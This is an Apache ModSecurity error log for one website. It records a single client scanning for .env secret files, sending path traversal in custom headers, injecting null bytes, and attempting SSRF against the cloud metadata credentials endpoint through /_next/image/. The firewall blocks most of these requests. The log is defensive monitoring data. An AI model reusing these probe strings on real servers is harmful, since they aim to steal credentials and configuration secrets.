[Tue May 12 05:10:31.984660 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJwgpmE1yW0glLdgnlgAAANg"]
[Tue May 12 05:10:31.984698 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJwgpmE1yW0glLdgnlgAAANg"]
[Tue May 12 05:10:31.984720 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJwgpmE1yW0glLdgnlgAAANg"]
[Tue May 12 05:10:31.984877 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJwgpmE1yW0glLdgnlgAAANg"]
[Tue May 12 05:10:31.984937 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJwgpmE1yW0glLdgnlgAAANg"]
[Tue May 12 05:10:31.984966 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJwgpmE1yW0glLdgnlgAAANg"]
[Tue May 12 05:10:31.985249 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 27)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJwgpmE1yW0glLdgnlgAAANg"]
[Tue May 12 05:10:31.985436 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 27 - SQLI=0,XSS=0,RFI=0,LFI=15,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaJwgpmE1yW0glLdgnlgAAANg"]
[Tue May 12 05:10:31.987341 2026] [core:error] [pid 1730207:tid 1730216] [client 45.148.10.246:21488] AH10244: invalid URI path (/static../../../../.env)
[Tue May 12 05:10:31.998932 2026] [:error] [pid 1820198:tid 1820205] [client 45.148.10.246:21614] File does not exist: /home/ixinabou/public_html/php-info.php
[Tue May 12 05:10:31.999148 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.staging"] [unique_id "agKaJxfeipD4uoG21FoqIwAAABc"]
[Tue May 12 05:10:31.999264 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.staging"] [unique_id "agKaJxfeipD4uoG21FoqIwAAABc"]
[Tue May 12 05:10:31.999458 2026] [security2:error] [pid 1808852:tid 1808878] [client 45.148.10.246:21630] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.staging"] [unique_id "agKaJxfeipD4uoG21FoqIwAAABc"]
[Tue May 12 05:10:32.001825 2026] [security2:error] [pid 1730207:tid 1730219] [client 45.148.10.246:21520] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ixinabourgoin.fr"] [uri "/_next/image/"] [unique_id "agKaKDue9Sp-pIv_Bb69JwAAAUo"]
[Tue May 12 05:10:32.002440 2026] [security2:error] [pid 1730207:tid 1730219] [client 45.148.10.246:21520] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/_next/image/"] [unique_id "agKaKDue9Sp-pIv_Bb69JwAAAUo"]
[Tue May 12 05:10:32.002627 2026] [security2:error] [pid 1730207:tid 1730219] [client 45.148.10.246:21520] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/_next/image/"] [unique_id "agKaKDue9Sp-pIv_Bb69JwAAAUo"]
[Tue May 12 05:10:32.003671 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaKAgpmE1yW0glLdgnmQAAANg"]
[Tue May 12 05:10:32.003710 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaKAgpmE1yW0glLdgnmQAAANg"]
[Tue May 12 05:10:32.003738 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaKAgpmE1yW0glLdgnmQAAANg"]
[Tue May 12 05:10:32.003916 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaKAgpmE1yW0glLdgnmQAAANg"]
[Tue May 12 05:10:32.003946 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Matched phrase "../" at REQUEST_HEADERS:X-Load-Config. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_HEADERS:X-Load-Config: ../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaKAgpmE1yW0glLdgnmQAAANg"]
[Tue May 12 05:10:32.004229 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 22)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaKAgpmE1yW0glLdgnmQAAANg"]
[Tue May 12 05:10:32.004415 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 22 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaKAgpmE1yW0glLdgnmQAAANg"]
[Tue May 12 05:10:32.007201 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKDue9Sp-pIv_Bb69KAAAAUk"]
[Tue May 12 05:10:32.007271 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKDue9Sp-pIv_Bb69KAAAAUk"]
[Tue May 12 05:10:32.007386 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKDue9Sp-pIv_Bb69KAAAAUk"]
[Tue May 12 05:10:32.007581 2026] [security2:error] [pid 1730207:tid 1730218] [client 45.148.10.246:21454] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.local"] [unique_id "agKaKDue9Sp-pIv_Bb69KAAAAUk"]
[Tue May 12 05:10:32.017180 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.246:21614] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.backup"] [unique_id "agKaKM1tk6y7yBJLpJozLwAAAIU"]
[Tue May 12 05:10:32.017293 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.246:21614] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.backup"] [unique_id "agKaKM1tk6y7yBJLpJozLwAAAIU"]
[Tue May 12 05:10:32.017471 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.246:21614] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.backup"] [unique_id "agKaKM1tk6y7yBJLpJozLwAAAIU"]
[Tue May 12 05:10:32.017621 2026] [:error] [pid 1825287:tid 1825326] [client 45.148.10.246:21580] File does not exist: /home/ixinabou/public_html/test.php
[Tue May 12 05:10:32.022148 2026] [security2:error] [pid 1730207:tid 1730219] [client 45.148.10.246:21520] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ixinabourgoin.fr"] [uri "/_next/image/"] [unique_id "agKaKDue9Sp-pIv_Bb69KQAAAUo"]
[Tue May 12 05:10:32.022709 2026] [security2:error] [pid 1730207:tid 1730219] [client 45.148.10.246:21520] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/_next/image/"] [unique_id "agKaKDue9Sp-pIv_Bb69KQAAAUo"]
[Tue May 12 05:10:32.022903 2026] [security2:error] [pid 1730207:tid 1730219] [client 45.148.10.246:21520] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/_next/image/"] [unique_id "agKaKDue9Sp-pIv_Bb69KQAAAUo"]
[Tue May 12 05:10:32.023270 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaKAgpmE1yW0glLdgnmwAAANg"]
[Tue May 12 05:10:32.023304 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Found 1 byte(s) in REQUEST_HEADERS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaKAgpmE1yW0glLdgnmwAAANg"]
[Tue May 12 05:10:32.023326 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Found 1 byte(s) in ARGS:X-App-Env outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaKAgpmE1yW0glLdgnmwAAANg"]
[Tue May 12 05:10:32.023752 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 12)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaKAgpmE1yW0glLdgnmwAAANg"]
[Tue May 12 05:10:32.023949 2026] [security2:error] [pid 1825287:tid 1825330] [client 45.148.10.246:21604] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 12 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Invalid character in request (null character)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/api/v1/health"] [unique_id "agKaKAgpmE1yW0glLdgnmwAAANg"]
